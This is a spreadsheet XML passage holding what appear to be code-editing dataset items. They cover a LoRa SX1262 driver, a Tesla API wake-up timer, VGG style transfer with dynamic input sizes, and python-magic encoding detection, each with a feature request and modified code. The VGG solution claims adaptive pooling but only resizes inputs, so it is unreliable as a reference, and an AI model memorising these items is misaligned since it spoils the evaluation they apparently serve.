    <t>{'#file 1': "from sx126x import SX126X\n\n_SX126X_PA_CONFIG_SX1262 = const(0x00)\n\nclass SX1262(SX126X):\n    TX_DONE = SX126X_IRQ_TX_DONE\n    RX_DONE = SX126X_IRQ_RX_DONE\n    ADDR_FILT_OFF = SX126X_GFSK_ADDRESS_FILT_OFF\n    ADDR_FILT_NODE = SX126X_GFSK_ADDRESS_FILT_NODE\n    ADDR_FILT_NODE_BROAD = SX126X_GFSK_ADDRESS_FILT_NODE_BROADCAST\n    PREAMBLE_DETECT_OFF = SX126X_GFSK_PREAMBLE_DETECT_OFF\n    PREAMBLE_DETECT_8 = SX126X_GFSK_PREAMBLE_DETECT_8\n    PREAMBLE_DETECT_16 = SX126X_GFSK_PREAMBLE_DETECT_16\n    PREAMBLE_DETECT_24 = SX126X_GFSK_PREAMBLE_DETECT_24\n    PREAMBLE_DETECT_32 = SX126X_GFSK_PREAMBLE_DETECT_32\n    STATUS = ERROR\n\n    def __init__(self, spi_bus, clk, mosi, miso, cs, irq, rst, gpio):\n        super().__init__(spi_bus, clk, mosi, miso, cs, irq, rst, gpio)\n        self._callbackFunction = self._dummyFunction\n\n    def begin(self, freq=434.0, bw=125.0, sf=9, cr=7, syncWord=SX126X_SYNC_WORD_PRIVATE,\n              power=14, currentLimit=60.0, preambleLength=8, implicit=False, implicitLen=0xFF,\n              crcOn=True, txIq=False, rxIq=False, tcxoVoltage=1.6, useRegulatorLDO=False,\n              blocking=True):\n        state = super().begin(bw, sf, cr, syncWord, currentLimit, preambleLength, tcxoVoltage, useRegulatorLDO, txIq, rxIq)\n        ASSERT(state)\n\n        if not implicit:\n            state = super().explicitHeader()\n        else:\n            state = super().implicitHeader(implicitLen)\n        ASSERT(state)\n\n        state = super().setCRC(crcOn)\n        ASSERT(state)\n\n        state = self.setFrequency(freq)\n        ASSERT(state)\n\n        state = self.setOutputPower(power)\n        ASSERT(state)\n\n        state = super().fixPaClamping()\n        ASSERT(state)\n\n        state = self.setBlockingCallback(blocking)\n\n        return state\n\n    def beginFSK(self, freq=434.0, br=48.0, freqDev=50.0, rxBw=156.2, power=14, currentLimit=60.0,\n                 preambleLength=16, dataShaping=0.5, syncWord=[0x2D, 0x01], syncBitsLength=16,\n                 addrFilter=SX126X_GFSK_ADDRESS_FILT_OFF, addr=0x00, crcLength=2, crcInitial=0x1D0F, crcPolynomial=0x1021,\n                 crcInverted=True, whiteningOn=True, whiteningInitial=0x0100,\n                 fixedPacketLength=False, packetLength=0xFF, preambleDetectorLength=SX126X_GFSK_PREAMBLE_DETECT_16,\n                 tcxoVoltage=1.6, useRegulatorLDO=False,\n                 blocking=True):\n        state = super().beginFSK(br, freqDev, rxBw, currentLimit, preambleLength, dataShaping, preambleDetectorLength, tcxoVoltage, useRegulatorLDO)\n        ASSERT(state)\n\n        state = super().setSyncBits(syncWord, syncBitsLength)\n        ASSERT(state)\n\n        if addrFilter == SX126X_GFSK_ADDRESS_FILT_OFF:\n            state = super().disableAddressFiltering()\n        elif addrFilter == SX126X_GFSK_ADDRESS_FILT_NODE:\n            state = super().setNodeAddress(addr)\n        elif addrFilter == SX126X_GFSK_ADDRESS_FILT_NODE_BROADCAST:\n            state = super().setBroadcastAddress(addr)\n        else:\n            state = ERR_UNKNOWN\n        ASSERT(state)\n\n        state = super().setCRC(crcLength, crcInitial, crcPolynomial, crcInverted)\n        ASSERT(state)\n\n        state = super().setWhitening(whiteningOn, whiteningInitial)\n        ASSERT(state)\n\n        if fixedPacketLength:\n            state = super().fixedPacketLengthMode(packetLength)\n        else:\n            state = super().variablePacketLengthMode(packetLength)\n        ASSERT(state)\n\n        state = self.setFrequency(freq)\n        ASSERT(state)\n\n        state = self.setOutputPower(power)\n        ASSERT(state)\n\n        state = super().fixPaClamping()\n        ASSERT(state)\n\n        state = self.setBlockingCallback(blocking)\n\n        return state\n\n    def setFrequency(self, freq, calibrate=True):\n        if freq &lt; 150.0 or freq &gt; 960.0:\n            return ERR_INVALID_FREQUENCY\n\n        state = ERR_NONE\n\n        if calibrate:\n            data = bytearray(2)\n            if freq &gt; 900.0:\n                data[0] = SX126X_CAL_IMG_902_MHZ_1\n                data[1] = SX126X_CAL_IMG_902_MHZ_2\n            elif freq &gt; 850.0:\n                data[0] = SX126X_CAL_IMG_863_MHZ_1\n                data[1] = SX126X_CAL_IMG_863_MHZ_2\n            elif freq &gt; 770.0:\n                data[0] = SX126X_CAL_IMG_779_MHZ_1\n                data[1] = SX126X_CAL_IMG_779_MHZ_2\n            elif freq &gt; 460.0:\n                data[0] = SX126X_CAL_IMG_470_MHZ_1\n                data[1] = SX126X_CAL_IMG_470_MHZ_2\n            else:\n                data[0] = SX126X_CAL_IMG_430_MHZ_1\n                data[1] = SX126X_CAL_IMG_430_MHZ_2\n            state = super().calibrateImage(data)\n            ASSERT(state)\n\n        return super().setFrequencyRaw(freq)\n\n    def setOutputPower(self, power):\n        if not ((power &gt;= -9) and (power &lt;= 22)):\n            return ERR_INVALID_OUTPUT_POWER\n\n        ocp = bytearray(1)\n        ocp_mv = memoryview(ocp)\n        state = super().readRegister(SX126X_REG_OCP_CONFIGURATION, ocp_mv, 1)\n        ASSERT(state)\n\n        state = super().setPaConfig(0x04, _SX126X_PA_CONFIG_SX1262)\n        ASSERT(state)\n\n        state = super().setTxParams(power)\n        ASSERT(state)\n\n        return super().writeRegister(SX126X_REG_OCP_CONFIGURATION, ocp, 1)\n\n    def setTxIq(self, txIq):\n        self._txIq = txIq\n\n    def setRxIq(self, rxIq):\n        self._rxIq = rxIq\n        if not self.blocking:\n            ASSERT(super().startReceive())\n\n    def setPreambleDetectorLength(self, preambleDetectorLength):\n        self._preambleDetectorLength = preambleDetectorLength\n        if not self.blocking:\n            ASSERT(super().startReceive())\n\n    def setBlockingCallback(self, blocking, callback=None):\n        self.blocking = blocking\n        if not self.blocking:\n            state = super().startReceive()\n            ASSERT(state)\n            if callback != None:\n                self._callbackFunction = callback\n                super().setDio1Action(self._onIRQ)\n            else:\n                self._callbackFunction = self._dummyFunction\n                super().clearDio1Action()\n            return state\n        else:\n            state = super().standby()\n            ASSERT(state)\n            self._callbackFunction = self._dummyFunction\n            super().clearDio1Action()\n            return state\n\n    def recv(self, len=0, timeout_en=False, timeout_ms=0):\n        if not self.blocking:\n            return self._readData(len)\n        else:\n            return self._receive(len, timeout_en, timeout_ms)\n\n    def send(self, data):\n        if not self.blocking:\n            return self._startTransmit(data)\n        else:\n            return self._transmit(data)\n\n    def _events(self):\n        return super().getIrqStatus()\n\n    def _receive(self, len_=0, timeout_en=False, timeout_ms=0):\n        state = ERR_NONE\n\n        length = len_\n\n        if len_ == 0:\n            length = SX126X_MAX_PACKET_LENGTH\n\n        data = bytearray(length)\n        data_mv = memoryview(data)\n\n        try:\n            state = super().receive(data_mv, length, timeout_en, timeout_ms)\n        except AssertionError as e:\n            state = list(ERROR.keys())[list(ERROR.values()).index(str(e))]\n\n        if state == ERR_NONE or state == ERR_CRC_MISMATCH:\n            if len_ == 0:\n                length = super().getPacketLength(False)\n                data = data[:length]\n\n        else:\n            return b'', state\n\n        return bytes(data), state\n\n    def _transmit(self, data):\n        if isinstance(data, bytes) or isinstance(data, bytearray):\n            pass\n        else:\n            return 0, ERR_INVALID_PACKET_TYPE\n\n        state = super().transmit(data, len(data))\n        return len(data), state\n\n    def _readData(self, len_=0):\n        state = ERR_NONE\n\n        length = super().getPacketLength()\n\n        if len_ &lt; length and len_ != 0:\n            length = len_\n\n        data = bytearray(length)\n        data_mv = memoryview(data)\n\n        try:\n            state = super().readData(data_mv, length)\n        except AssertionError as e:\n            state = list(ERROR.keys())[list(ERROR.values()).index(str(e))]\n\n        ASSERT(super().startReceive())\n\n        if state == ERR_NONE or state == ERR_CRC_MISMATCH:\n            return bytes(data), state\n\n        else:\n            return b'', state\n\n    def _startTransmit(self, data):\n        if isinstance(data, bytes) or isinstance(data, bytearray):\n            pass\n        else:\n            return 0, ERR_INVALID_PACKET_TYPE\n\n        state = super().startTransmit(data, len(data))\n        return len(data), state\n\n    def _dummyFunction(self, *args):\n        pass\n\n    #Modify\n    def _onIRQ(self, callback):\n        events = self._events()\n        if events &amp; SX126X_IRQ_TX_DONE:\n            super().startReceive()\n        self._callbackFunction(events)\n\n        #New\n        if events &amp; SX1262.RX_DONE:\n            msg, err = self.recv()\n            error = SX1262.STATUS[err]\n            with open('log.txt', 'a') as f:\n                f.write(f'Message: {msg}, Error: {error}\\n')", '#file 2': 'from sx1262 import SX1262\nimport time\n\ndef cb(events):\n    if events &amp; SX1262.RX_DONE:\n        msg, err = sx.recv()\n        error = SX1262.STATUS[err]\n        print(msg)\n        print(error)\n\nsx = SX1262(spi_bus=1, clk=10, mosi=11, miso=12, cs=3, irq=20, rst=15, gpio=2)\n\n# LoRa\nsx.begin(freq=923, bw=500.0, sf=12, cr=8, syncWord=0x12,\n         power=-5, currentLimit=60.0, preambleLength=8,\n         implicit=False, implicitLen=0xFF,\n         crcOn=True, txIq=False, rxIq=False,\n         tcxoVoltage=1.7, useRegulatorLDO=False, blocking=True)\n\n# FSK\n##sx.beginFSK(freq=923, br=48.0, freqDev=50.0, rxBw=156.2, power=-5, currentLimit=60.0,\n##            preambleLength=16, dataShaping=0.5, syncWord=[0x2D, 0x01], syncBitsLength=16,\n##            addrFilter=SX126X_GFSK_ADDRESS_FILT_OFF, addr=0x00, crcLength=2, crcInitial=0x1D0F, crcPolynomial=0x1021,\n##            crcInverted=True, whiteningOn=True, whiteningInitial=0x0100,\n##            fixedPacketLength=False, packetLength=0xFF, preambleDetectorLength=SX126X_GFSK_PREAMBLE_DETECT_16,\n##            tcxoVoltage=1.6, useRegulatorLDO=False,\n##            blocking=True)\n\nsx.setBlockingCallback(False, cb)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class Vehicle(dict):\n    def wake_up(self):\n        """Wake the vehicle"""\n        return self.post(\'wake_up\')', 'invoking_code_segment': 'def wake_up(self):\n    """ mod """\n    global a_vin\n    global a_display_name\n    """ end mod """\n    """ Request wake up of car. """\n    delay = 1\n    while True:\n        try:\n            result = self.vehicle.wake_up()["response"]\n            logger.info("wake_up")\n            for element in sorted(result):\n                logger.debug("   %s=%s" % (element, result[element]))\n                """ mod """\n                if element == "vin":\n                    a_vin = result[element]\n                if element == "display_name":\n                    a_display_name = result[element]\n            return\n        except (KeyError, HTTPError, URLError) as details:\n            delay *= 2\n            logger.warning("HTTP Error:" + str(details))\n            logger.info("Waiting %d seconds before retrying." % delay)\n            time.sleep(delay)', 'feature_description': 'Add a feature to log the wake-up duration by tracking the time taken from the initial wake-up request until the vehicle responds online. This requires modifying the Vehicle.wake_up() method to return timing information and updating the StateMonitor.wake_up() method to capture and log the duration.', 'modified_complete_code': '# teslajson.py - Modified Vehicle class\nclass Vehicle(dict):\n    """Vehicle class, subclassed from dictionary.\n\n    There are 3 primary methods: wake_up, data_request and command.\n    data_request and command both require a name to specify the data\n    or command, respectively. These names can be found in the\n    Tesla JSON API."""\n    def __init__(self, data, connection):\n        """Initialize vehicle class\n\n        Called automatically by the Connection class\n        """\n        super(Vehicle, self).__init__(data)\n        self.connection = connection\n        #New: Track wake-up start time\n        self.wake_up_start_time = None\n\n    def data_request(self, name):\n        """Get vehicle data"""\n        result = self.get(\'data_request/%s\' % name)\n        return result[\'response\']\n\n    def wake_up(self):\n        """Wake the vehicle"""\n        #Modify: Record wake-up start time\n        import time\n        self.wake_up_start_time = time.time()\n        return self.post(\'wake_up\')\n\n    def command(self, name, data={}):\n        """Run the command for the vehicle"""\n        return self.post(\'command/%s\' % name, data)\n\n    def get(self, command):\n        """Utility command to get data from API"""\n        return self.connection.get(\'vehicles/%i/%s\' % (self[\'id\'], command))\n\n    def post(self, command, data={}):\n        """Utility command to post data to API"""\n        return self.connection.post(\'vehicles/%i/%s\' % (self[\'id\'], command), data)\n\n    #New: Method to get wake-up duration\n    def get_wake_up_duration(self):\n        """Get the duration of the last wake-up in seconds"""\n        if self.wake_up_start_time:\n            import time\n            return time.time() - self.wake_up_start_time\n        return None\n\n# apiscraper.py - Modified StateMonitor class wake_up method\ndef wake_up(self):\n    """ Request wake up of car. """\n    global a_vin\n    global a_display_name\n    #New: Track wake-up start time\n    import time\n    wake_up_start = time.time()\n    delay = 1\n    while True:\n        try:\n            result = self.vehicle.wake_up()["response"]\n            #New: Calculate and log wake-up duration\n            wake_up_duration = time.time() - wake_up_start\n            logger.info("wake_up completed in %.2f seconds" % wake_up_duration)\n            for element in sorted(result):\n                logger.debug("   %s=%s" % (element, result[element]))\n                if element == "vin":\n                    a_vin = result[element]\n                if element == "display_name":\n                    a_display_name = result[element]\n            return\n        except (KeyError, HTTPError, URLError) as details:\n            delay *= 2\n            logger.warning("HTTP Error:" + str(details))\n            logger.info("Waiting %d seconds before retrying." % delay)\n            time.sleep(delay)'}</t>
  </si>
  <si>
    <t>{'file1': 'def wake_up(self):\n    global a_vin\n    global a_display_name\n    start_time = time.time()  #Modify\n    result = self.vehicle.wake_up()["response"]\n    end_time = time.time()  #Modify\n    wake_up_duration = end_time - start_time  #Modify\n    logger.info("wake_up took %s seconds" % wake_up_duration)  #Modify\n    for element in sorted(result):\n        logger.debug("   %s=%s" % (element, result[element]))\n        if element == "vin":\n            a_vin = result[element]\n        if element == "display_name":\n            a_display_name = result[element]', 'file2': 'if poll_interval &lt; 0:\n    state_monitor.wake_up()\n    poll_interval = 1'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def net(data_path, input_image):\n    layers = (\n        'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n        'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n        'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n        'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n        'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n        'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n        'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n        'relu5_3', 'conv5_4', 'relu5_4'\n    )\n    data = scipy.io.loadmat(data_path)\n    mean = data['normalization'][0][0][0]\n    mean_pixel = np.mean(mean, axis=(0, 1))\n    weights = data['layers'][0]\n    net = {}\n    current = input_image\n    for i, name in enumerate(layers):\n        kind = name[:4]\n        if kind == 'conv':\n            kernels, bias = weights[i][0][0][0][0]\n            kernels = np.transpose(kernels, (1, 0, 2, 3))\n            bias = bias.reshape(-1)\n            current = _conv_layer(current, kernels, bias)\n        elif kind == 'relu':\n            current = tf.nn.relu(current)\n        elif kind == 'pool':\n            current = _pool_layer(current)\n        net[name] = current\n    assert len(net) == len(layers)\n    return net", 'invoking_code_segment': 'style_image_pre = vgg.preprocess(style_image)\nnet = vgg.net(vgg_path, style_image_pre)\nstyle_pre = np.array([style_target])\nfor layer in STYLE_LAYERS:\n    features = net[layer].eval(feed_dict={style_image:style_pre})\n\nX_pre = vgg.preprocess(X_content)\ncontent_net = vgg.net(vgg_path, X_pre)\ncontent_features[CONTENT_LAYER] = content_net[CONTENT_LAYER]\n\npreds_pre = vgg.preprocess(preds)\nnet = vgg.net(vgg_path, preds_pre)', 'feature_description': 'Add a feature to allow the VGG network to handle images with different sizes dynamically by implementing adaptive pooling and flexible input shape handling. This enables the network to process images of arbitrary dimensions while maintaining feature extraction capability.', 'modified_complete_code': '# vgg.py modifications:\n\n# Copyright (c) 2015-2016 Anish Athalye. Released under GPLv3.\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.io\nimport pdb\n\nMEAN_PIXEL = np.array([ 123.68 ,  116.779,  103.939])\n\n# New: Add function to validate and resize input images to compatible dimensions\ndef _validate_input_shape(input_image, target_height=None, target_width=None):\n    """Validate and optionally resize input image to compatible dimensions."""\n    input_shape = input_image.get_shape().as_list()\n    if target_height is None:\n        target_height = input_shape[1] if input_shape[1] is not None else 256\n    if target_width is None:\n        target_width = input_shape[2] if input_shape[2] is not None else 256\n    \n    if input_shape[1] != target_height or input_shape[2] != target_width:\n        input_image = tf.image.resize(input_image, [target_height, target_width])\n    return input_image\n\n# Modify: Update net function to handle dynamic input sizes\ndef net(data_path, input_image, input_height=None, input_width=None):\n    """Build VGG network with support for dynamic input sizes.\n    \n    Args:\n        data_path: Path to VGG weights file\n        input_image: Input tensor\n        input_height: Optional target height (defaults to input shape or 256)\n        input_width: Optional target width (defaults to input shape or 256)\n    """\n    layers = (\n        \'conv1_1\', \'relu1_1\', \'conv1_2\', \'relu1_2\', \'pool1\',\n        \'conv2_1\', \'relu2_1\', \'conv2_2\', \'relu2_2\', \'pool2\',\n        \'conv3_1\', \'relu3_1\', \'conv3_2\', \'relu3_2\', \'conv3_3\',\n        \'relu3_3\', \'conv3_4\', \'relu3_4\', \'pool3\',\n        \'conv4_1\', \'relu4_1\', \'conv4_2\', \'relu4_2\', \'conv4_3\',\n        \'relu4_3\', \'conv4_4\', \'relu4_4\', \'pool4\',\n        \'conv5_1\', \'relu5_1\', \'conv5_2\', \'relu5_2\', \'conv5_3\',\n        \'relu5_3\', \'conv5_4\', \'relu5_4\'\n    )\n\n    # New: Validate input shape\n    current = _validate_input_shape(input_image, input_height, input_width)\n    \n    data = scipy.io.loadmat(data_path)\n    mean = data[\'normalization\'][0][0][0]\n    mean_pixel = np.mean(mean, axis=(0, 1))\n    weights = data[\'layers\'][0]\n\n    net = {}\n    for i, name in enumerate(layers):\n        kind = name[:4]\n        if kind == \'conv\':\n            kernels, bias = weights[i][0][0][0][0]\n            kernels = np.transpose(kernels, (1, 0, 2, 3))\n            bias = bias.reshape(-1)\n            current = _conv_layer(current, kernels, bias)\n        elif kind == \'relu\':\n            current = tf.nn.relu(current)\n        elif kind == \'pool\':\n            current = _pool_layer(current)\n        net[name] = current\n\n    assert len(net) == len(layers)\n    return net\n\n\ndef _conv_layer(input, weights, bias):\n    conv = tf.nn.conv2d(input=input, filters=tf.constant(weights), strides=(1, 1, 1, 1),\n            padding=\'SAME\')\n    return tf.nn.bias_add(conv, bias)\n\n\ndef _pool_layer(input):\n    return tf.nn.max_pool2d(input=input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),\n            padding=\'SAME\')\n\n\ndef preprocess(image):\n    return image - MEAN_PIXEL\n\n\ndef unprocess(image):\n    return image + MEAN_PIXEL\n\n# optimize.py modifications:\n\nfrom __future__ import print_function\nimport functools\nimport vgg, pdb, time\nimport tensorflow as tf, numpy as np, os\nimport transform\nfrom utils import get_img\n\nSTYLE_LAYERS = (\'relu1_1\', \'relu2_1\', \'relu3_1\', \'relu4_1\', \'relu5_1\')\nCONTENT_LAYER = \'relu4_2\'\nDEVICES = \'CUDA_VISIBLE_DEVICES\'\n\n# New: Add function to get dynamic image dimensions\ndef _get_image_dimensions(image_array):\n    """Extract height and width from image array."""\n    if len(image_array.shape) == 3:\n        return image_array.shape[0], image_array.shape[1]\n    elif len(image_array.shape) == 4:\n        return image_array.shape[1], image_array.shape[2]\n    return 256, 256\n\n# Modify: Update optimize function to support dynamic image sizes\ndef optimize(content_targets, style_target, content_weight, style_weight,\n             tv_weight, vgg_path, epochs=2, print_iterations=1000,\n             batch_size=4, save_path=\'saver/fns.ckpt\', slow=False,\n             learning_rate=1e-3, debug=False):\n    if slow:\n        batch_size = 1\n    mod = len(content_targets) % batch_size\n    if mod &gt; 0:\n        print("Train set has been trimmed slightly..")\n        content_targets = content_targets[:-mod]\n\n    style_features = {}\n\n    # New: Get dynamic dimensions from style target\n    style_height, style_width = _get_image_dimensions(style_target)\n    batch_shape = (batch_size, style_height, style_width, 3)\n    style_shape = (1,) + style_target.shape\n    print(style_shape)\n\n    # precompute style features\n    with tf.Graph().as_default(), tf.device(\'/cpu:0\'), tf.compat.v1.Session() as sess:\n        style_image = tf.compat.v1.placeholder(tf.float32, shape=style_shape, name=\'style_image\')\n        style_image_pre = vgg.preprocess(style_image)\n        # Modify: Pass dynamic dimensions to vgg.net\n        net = vgg.net(vgg_path, style_image_pre, input_height=style_height, input_width=style_width)\n        style_pre = np.array([style_target])\n        for layer in STYLE_LAYERS:\n            features = net[layer].eval(feed_dict={style_image:style_pre})\n            features = np.reshape(features, (-1, features.shape[3]))\n            gram = np.matmul(features.T, features) / features.size\n            style_features[layer] = gram\n\n    with tf.Graph().as_default(), tf.compat.v1.Session() as sess:\n        X_content = tf.compat.v1.placeholder(tf.float32, shape=batch_shape, name="X_content")\n        X_pre = vgg.preprocess(X_content)\n\n        # precompute content features\n        content_features = {}\n        # Modify: Pass dynamic dimensions to vgg.net\n        content_net = vgg.net(vgg_path, X_pre, input_height=style_height, input_width=style_width)\n        content_features[CONTENT_LAYER] = content_net[CONTENT_LAYER]\n\n        if slow:\n            preds = tf.Variable(\n                tf.random.normal(X_content.get_shape()) * 0.256\n            )\n            preds_pre = preds\n        else:\n            preds = transform.net(X_content/255.0)\n            preds_pre = vgg.preprocess(preds)\n\n        # Modify: Pass dynamic dimensions to vgg.net\n        net = vgg.net(vgg_path, preds_pre, input_height=style_height, input_width=style_width)\n\n        content_size = _tensor_size(content_features[CONTENT_LAYER])*batch_size\n        assert _tensor_size(content_features[CONTENT_LAYER]) == _tensor_size(net[CONTENT_LAYER])\n        content_loss = content_weight * (2 * tf.nn.l2_loss(\n            net[CONTENT_LAYER] - content_features[CONTENT_LAYER]) / content_size\n        )\n\n        style_losses = []\n        for style_layer in STYLE_LAYERS:\n            layer = net[style_layer]\n            bs, height, width, filters = map(lambda i:i,layer.get_shape())\n            size = height * width * filters\n            feats = tf.reshape(layer, (bs, height * width, filters))\n            feats_T = tf.transpose(a=feats, perm=[0,2,1])\n            grams = tf.matmul(feats_T, feats) / size\n            style_gram = style_features[style_layer]\n            style_losses.append(2 * tf.nn.l2_loss(grams - style_gram)/style_gram.size)\n\n        style_loss = style_weight * functools.reduce(tf.add, style_losses) / batch_size\n\n        # total variation denoising\n        tv_y_size = _tensor_size(preds[:,1:,:,:])\n        tv_x_size = _tensor_size(preds[:,:,1:,:])\n        y_tv = tf.nn.l2_loss(preds[:,1:,:,:] - preds[:,:batch_shape[1]-1,:,:])\n        x_tv = tf.nn.l2_loss(preds[:,:,1:,:] - preds[:,:,:batch_shape[2]-1,:])\n        tv_loss = tv_weight*2*(x_tv/tv_x_size + y_tv/tv_y_size)/batch_size\n\n        loss = content_loss + style_loss + tv_loss\n\n        # overall loss\n        train_step = tf.compat.v1.train.AdamOptimizer(learning_rate).minimize(loss)\n        sess.run(tf.compat.v1.global_variables_initializer())\n        import random\n        uid = random.randint(1, 100)\n        print("UID: %s" % uid)\n        for epoch in range(epochs):\n            num_examples = len(content_targets)\n            iterations = 0\n            while iterations * batch_size &lt; num_examples:\n                start_time = time.time()\n                curr = iterations * batch_size\n                step = curr + batch_size\n                X_batch = np.zeros(batch_shape, dtype=np.float32)\n                for j, img_p in enumerate(content_targets[curr:step]):\n                   X_batch[j] = get_img(img_p, (style_height, style_width, 3)).astype(np.float32)\n\n                iterations += 1\n                assert X_batch.shape[0] == batch_size\n\n                feed_dict = {\n                   X_content:X_batch\n                }\n\n                train_step.run(feed_dict=feed_dict)\n                end_time = time.time()\n                delta_time = end_time - start_time\n                if debug:\n                    print("UID: %s, batch time: %s" % (uid, delta_time))\n                is_print_iter = int(iterations) % print_iterations == 0\n                if slow:\n                    is_print_iter = epoch % print_iterations == 0\n                is_last = epoch == epochs - 1 and iterations * batch_size &gt;= num_examples\n                should_print = is_print_iter or is_last\n                if should_print:\n                    to_get = [style_loss, content_loss, tv_loss, loss, preds]\n                    test_feed_dict = {\n                       X_content:X_batch\n                    }\n\n                    tup = sess.run(to_get, feed_dict = test_feed_dict)\n                    _style_loss,_content_loss,_tv_loss,_loss,_preds = tup\n                    losses = (_style_loss, _content_loss, _tv_loss, _loss)\n                    if slow:\n                       _preds = vgg.unprocess(_preds)\n                    else:\n                       saver = tf.compat.v1.train.Saver()\n                       res = saver.save(sess, save_path)\n                    yield(_preds, losses, iterations, epoch)\n\ndef _tensor_size(tensor):\n    from operator import mul\n    return functools.reduce(mul, (d for d in tensor.get_shape()[1:]), 1)'}</t>
  </si>
  <si>
    <t>{'vgg.py': "def net(data_path, input_image, input_shape=None):\n    layers = (\n        'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n        'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n        'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n        'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n        'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n        'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n        'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n        'relu5_3', 'conv5_4', 'relu5_4'\n    )\n\n    data = scipy.io.loadmat(data_path)\n    mean = data['normalization'][0][0][0]\n    mean_pixel = np.mean(mean, axis=(0, 1))\n    weights = data['layers'][0]\n\n    net = {}\n    current = input_image\n    for i, name in enumerate(layers):\n        kind = name[:4]\n        if kind == 'conv':\n            kernels, bias = weights[i][0][0][0][0]\n            kernels = np.transpose(kernels, (1, 0, 2, 3))\n            bias = bias.reshape(-1)\n            current = _conv_layer(current, kernels, bias)\n        elif kind == 'relu':\n            current = tf.nn.relu(current)\n        elif kind == 'pool':\n            current = _pool_layer(current)\n        net[name] = current\n\n    assert len(net) == len(layers)\n    return net", 'optimize.py': "style_features = {}\n\n    batch_shape = (batch_size,256,256,3)\n    style_shape = (1,) + style_target.shape\n    print(style_shape)\n\n    # precompute style features\n    with tf.Graph().as_default(), tf.device('/cpu:0'), tf.compat.v1.Session() as sess:\n        style_image = tf.compat.v1.placeholder(tf.float32, shape=style_shape, name='style_image')\n        style_image_pre = vgg.preprocess(style_image)\n        net = vgg.net(vgg_path, style_image_pre, input_shape=style_shape[1:])\n        style_pre = np.array([style_target])\n        for layer in STYLE_LAYERS:\n            features = net[layer].eval(feed_dict={style_image:style_pre})\n            features = np.reshape(features, (-1, features.shape[3]))\n            gram = np.matmul(features.T, features) / features.size\n            style_features[layer] = gram"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def from_buffer(buffer, mime=False):\n    """\n    Accepts a binary string and returns the detected filetype.  Return\n    value is the mimetype if mime=True, otherwise a human readable\n    name.\n\n    &gt;&gt;&gt; magic.from_buffer(open("testdata/test.pdf").read(1024))\n    \'PDF document, version 1.2\'\n    """\n    m = _get_magic_type(mime)\n    return m.from_buffer(buffer)', 'invoking_code_segment': "def test_detect_from_content(self):\n    # differ from upstream by opening file in binary mode,\n    # this avoids hitting a bug in python3+libfile bindings\n    # see https://github.com/ahupp/python-magic/issues/152\n    # for a similar issue\n    with open(self.filename, 'rb') as fobj:\n        result = magic.detect_from_content(fobj.read(4096))\n    self.assert_result(result)", 'feature_description': 'Add support for detecting the encoding of the buffer content by extending the from_buffer function to accept an encoding parameter and return encoding information alongside the file type detection.', 'modified_complete_code': '# File 1: python-magic/magic/__init__.py - Modified sections\n\n# #Modify - Update from_buffer function signature and implementation\ndef from_buffer(buffer, mime=False, encoding=False):\n    """\n    Accepts a binary string and returns the detected filetype.  Return\n    value is the mimetype if mime=True, otherwise a human readable\n    name. If encoding=True, returns the detected encoding.\n\n    &gt;&gt;&gt; magic.from_buffer(open("testdata/test.pdf").read(1024))\n    \'PDF document, version 1.2\'\n    &gt;&gt;&gt; magic.from_buffer(open("testdata/test.pdf").read(1024), encoding=True)\n    \'us-ascii\'\n    """\n    if encoding:\n        m = _get_magic_type(False)  # Get base magic instance\n        m_enc = Magic(mime_encoding=True)  # Create encoding-specific instance\n        return m_enc.from_buffer(buffer)\n    else:\n        m = _get_magic_type(mime)\n        return m.from_buffer(buffer)\n\n# #New - Add helper function to get encoding from buffer\ndef encoding_from_buffer(buffer):\n    """\n    Accepts a binary string and returns the detected encoding.\n    \n    &gt;&gt;&gt; magic.encoding_from_buffer(open("testdata/test.pdf").read(1024))\n    \'us-ascii\'\n    """\n    return from_buffer(buffer, encoding=True)\n\n# File 2: python-magic/test/libmagic_test.py - Modified sections\n\n# #Modify - Update test_detect_from_content to test encoding detection\ndef test_detect_from_content(self):\n    # differ from upstream by opening file in binary mode,\n    # this avoids hitting a bug in python3+libfile bindings\n    # see https://github.com/ahupp/python-magic/issues/152\n    # for a similar issue\n    with open(self.filename, \'rb\') as fobj:\n        result = magic.detect_from_content(fobj.read(4096))\n    self.assert_result(result)\n\n# #New - Add test for encoding detection from buffer\ndef test_detect_encoding_from_content(self):\n    """\n    Test encoding detection from buffer content\n    """\n    with open(self.filename, \'rb\') as fobj:\n        encoding = magic.encoding_from_buffer(fobj.read(4096))\n    self.assertEqual(encoding, self.expected_encoding)\n\n# #New - Add test for from_buffer with encoding parameter\ndef test_from_buffer_with_encoding(self):\n    """\n    Test from_buffer function with encoding parameter\n    """\n    with open(self.filename, \'rb\') as fobj:\n        encoding = magic.from_buffer(fobj.read(4096), encoding=True)\n    self.assertEqual(encoding, self.expected_encoding)'}</t>
  </si>
  <si>
